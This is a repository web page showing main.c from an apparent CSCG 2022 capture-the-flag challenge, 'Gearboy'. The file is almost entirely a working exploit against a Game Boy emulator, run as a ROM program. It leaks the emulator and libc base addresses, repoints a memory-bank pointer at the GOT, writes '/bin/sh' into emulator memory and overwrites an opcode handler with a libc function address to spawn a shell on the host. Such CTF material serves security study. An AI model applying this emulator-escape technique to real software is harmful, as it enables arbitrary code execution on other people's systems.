main.c - cscg22-gearboy - CSCG 2022 Challenge 'Gearboy'

	cscg22-gearboy CSCG 2022 Challenge 'Gearboy'
	git clone https://git.sinitax.com/sinitax/cscg22-gearboy
	Log \| Files \| Refs \| sfeed.txt

main.c (971B)

      1#include "stdint.h"
      2#include "string.h"
      3
      4void
      5main(void)
      6{
      7	volatile static uint8_t *processor_gb;
      8	volatile static uint8_t *memory_gb;
      9	volatile static uint8_t *free_got_gb;
     10	volatile static uint64_t op0x00;
     11	volatile static uint64_t base;
     12	volatile static uint64_t libc;
     13	volatile static uint64_t free_got;
     14	volatile static uint64_t target;
     15
     16	/* NEEDS TO BE FIRST SESSION OF CONTAINER! */
     17
     18	/* processor - wrambanks = -0x126a0 */
     19
     20	/* WRAM BANK = -0x13 */
     21	processor_gb = (void*) 0xD960;
     22	memory_gb = processor_gb - 0xd0;
     23
     24	/* get base from op0x00 */
     25	op0x00 = *(uint64_t*)processor_gb;
     26	base = op0x00 - 0x1d420;
     27	free_got = base + 0x4ad78;
     28
     29	/* change lcdrambank pointer to access got */
     30	*(uint64_t*)(memory_gb+0x90) = free_got;
     31	free_got_gb = (void*) 0x8000;
     32
     33	libc = (*(uint64_t*)free_got_gb) - 0x9a6d0;
     34
     35	target = libc + 0x52290;
     36	strcpy((char*)processor_gb, "/bin/sh");
     37	*(uint64_t*)(processor_gb+0x10*0x10) = target;
     38
     39	__asm \
     40		stop \
     41	__endasm;
     42
     43	while (1);
     44}